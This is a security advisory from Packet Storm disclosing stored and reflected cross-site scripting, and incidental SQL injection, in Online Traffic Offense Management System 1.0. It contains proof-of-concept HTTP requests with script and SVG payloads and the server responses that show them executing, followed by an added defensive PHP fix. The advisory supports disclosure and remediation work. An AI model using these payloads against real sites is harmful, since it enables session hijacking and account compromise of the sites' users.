Online Traffic Offense Management System 1.0 Cross Site Scripting

  • Online Traffic Offense Management System version 1.0 suffers from persistent and reflected cross site scripting vulnerabilities.
    MD5 | 45b6e51d7759554a91843bef106f82e3

    # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)  
    # Date: 07/10/2021  
    # Exploit Author: Hubert Wojciechowski  
    # Contact Author: [email protected]  
    # Vendor Homepage: https://www.sourcecodester.com  
    # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html  
    # Version: 1.0  
    # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    ### XSS Stored and XSS Reflected  
    # All requests can be sent by both an authenticated and a non-authenticated user  
    # XSS Stored - example vulnerable pages and parameters:  
    * The entire application is susceptible to Stored XSS vulnerabilities; below are examples of pages and parameters  
    * We can upload an SVG file containing XSS to all upload locations in the web app  
    * We can add evil code from an admin account, a regular user account, or unauthenticated - only the request is needed  
    * http://localhost/traffic_offense/admin/?page=user  
    Parameters:  
    - firstname  
    - lastname  
    - user image - svg file with javascript code - XSS  
    * http://localhost/traffic_offense/classes/Master.php?f=save_offense_record  
    Parameters:  
    - date_created  
    - ticket_no  
    - officer_id  
    - officer_name  
    - status  
    - remarks  
    - SVG file with javascript code - XSS   
    * The entire application is vulnerable  
    # XSS Reflected - example vulnerable pages and parameters:  
    * http://localhost/traffic_offense/admin/?page  
    Parameters:  
    - page  
    * http://localhost/traffic_offense/classes/Login.php  
    Parameters:  
    - username  
    - password  
    * http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]  
    Parameters:  
    - id  
    * http://localhost/traffic_offense/classes/Master.php  
    Parameters:  
    - id  
    * http://localhost/traffic_offense/classes/Users.php  
    Parameters:  
    - id  
    -----------------------------------------------------------------------------------------------------------------------  
    # POC  
    -----------------------------------------------------------------------------------------------------------------------  
    ## Example 1 - XSS Reflected  
    # Request using POST method, payload is in the value of the id parameter  
    POST /traffic_offense/classes/Users.php?f=save HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: */*  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    X-Requested-With: XMLHttpRequest  
    Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583  
    Content-Length: 1061  
    Origin: http://localhost  
    Connection: close  
    Referer: http://localhost/traffic_offense/admin/?page=user  
    Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o  
    Sec-Fetch-Dest: empty  
    Sec-Fetch-Mode: cors  
    Sec-Fetch-Site: same-origin  
    -----------------------------21986352462593413643786432583  
    Content-Disposition: form-data; name="id"  
    13<script>alert(1)</script>37  
    -----------------------------21986352462593413643786432583  
    Content-Disposition: form-data; name="firstname"  
    hacked  
    [...]  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 01:05:26 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Content-Length: 186  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    UPDATE users set  firstname = 'sdasfd'  ,  lastname = 'fdxfd'  ,  username = 'test2'  ,  `password` = 'ad0234829205b9033196ba818f7a872b'  where id = 13<script>alert(1)</script>37  
    -----------------------------------------------------------------------------------------------------------------------  
    # Request using GET method, payload is in the value of the id parameter  
    GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: */*  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    X-Requested-With: XMLHttpRequest  
    Connection: close  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 05:28:35 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Content-Length: 7893  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1  
    SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />  
    [...]  
    -----------------------------------------------------------------------------------------------------------------------  
    ## Example 2  
    # XSS Stored  
    # Save JS payload in the user profile and add an SVG file via the vulnerable script  
    POST /traffic_offense/classes/Users.php?f=save HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: */*  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    X-Requested-With: XMLHttpRequest  
    Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102  
    Content-Length: 4304  
    Origin: http://localhost  
    Connection: close  
    Referer: http://localhost/traffic_offense/admin/?page=user  
    Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o  
    Sec-Fetch-Dest: empty  
    Sec-Fetch-Mode: cors  
    Sec-Fetch-Site: same-origin  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="id"  
    1  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="firstname"  
    admin"/><img src=x onmouseover=alert(1)>  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="lastname"  
    admin"/><img src=x onmouseover=alert(1)>  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="username"  
    admin  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="password"  
    admnin123  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="img"; filename="xss.svg"  
    Content-Type: image/svg+xml  
    [...]SVG PAYLOAD[...]  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 05:31:29 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Content-Length: 1  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    1  
    -----------------------------------------------------------------------------------------------------------------------  
    # Request to download the new user data  
    GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    Connection: close  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 05:42:04 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    Content-Length: 24719  
    [...]  
    <div class="form-group col-6">  
    <label for="name">First Name</label>  
    <input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>  
    </div>  
    <div class="form-group col-6">  
    <label for="name">Last Name</label>  
    <input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>  
    </div>  
    [...]  
    <div class="form-group col-6 d-flex justify-content-center">  
    <img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">  
    </div>  
    [...]  
    

    Source: packetstormsecurity.com

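The advisory shows three sinks: the `id` parameter concatenated into a SQL string and echoed back inside a database error, the `firstname`/`lastname` values written unencoded into an `<input value="...">` attribute, and an image upload that stores SVG (which may carry script) under the client's filename. The PHP below is an added defensive example, not code from the advisory or from the Online Traffic Offense Management System project; it assumes a configured PDO connection `$pdo`, the `users` table columns visible in the advisory's `UPDATE` statement, and hypothetical helper names (`parseId`, `loadUser`, `h`, `renderNameField`, `storeProfileImage`) chosen for this illustration.

```php
<?php
// Added example (not the project's code): hardened handling for the three
// sinks described in the advisory. Table and column names follow the
// advisory's UPDATE query; $pdo is assumed to be a configured PDO connection.
declare(strict_types=1);

// 1. The id parameter: validate as a positive integer and bind it, never
//    concatenate. A value such as 13<script>alert(1)</script>37 is rejected
//    before any SQL runs, so no database error text can reach the page.
function parseId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function loadUser(PDO $pdo, $rawId): ?array
{
    $id = parseId($rawId);
    if ($id === null) {
        return null; // caller answers with HTTP 400; nothing is reflected
    }
    $stmt = $pdo->prepare('SELECT id, firstname, lastname, img FROM users WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 2. Output encoding for the HTML attribute context. ENT_QUOTES encodes the
//    double quote, so admin"/><img ...> can no longer break out of value="...".
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderNameField(string $name, string $label, string $value): string
{
    return sprintf(
        '<label for="%1$s">%2$s</label>'
        . '<input type="text" name="%1$s" id="%1$s" class="form-control" value="%3$s" required>',
        h($name),
        h($label),
        h($value)
    );
}

// 3. Upload handling: accept only raster image types verified from file
//    content, store under a server-generated name, and ignore the client's
//    filename and Content-Type. SVG is XML that can embed script, so it is
//    deliberately absent from this list.
const ALLOWED_IMAGE_TYPES = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

function storeProfileImage(array $file, string $uploadDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // getimagesize() inspects the magic bytes; an SVG document returns false.
    $info = @getimagesize($file['tmp_name']);
    $type = $info[2] ?? null;
    if ($type === null || !isset(ALLOWED_IMAGE_TYPES[$type])) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$type];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $name; // persist this name; never the client-supplied filename
}
```

Two points a reviewer would check in a fix like this: the error branch of `loadUser` must not print the exception or query text (the advisory's reflected case exists only because the raw MariaDB error is rendered), and the `uploads/` directory should be served with `X-Content-Type-Options: nosniff` and without script execution so that a file which slips past the type check still cannot run in the site's origin.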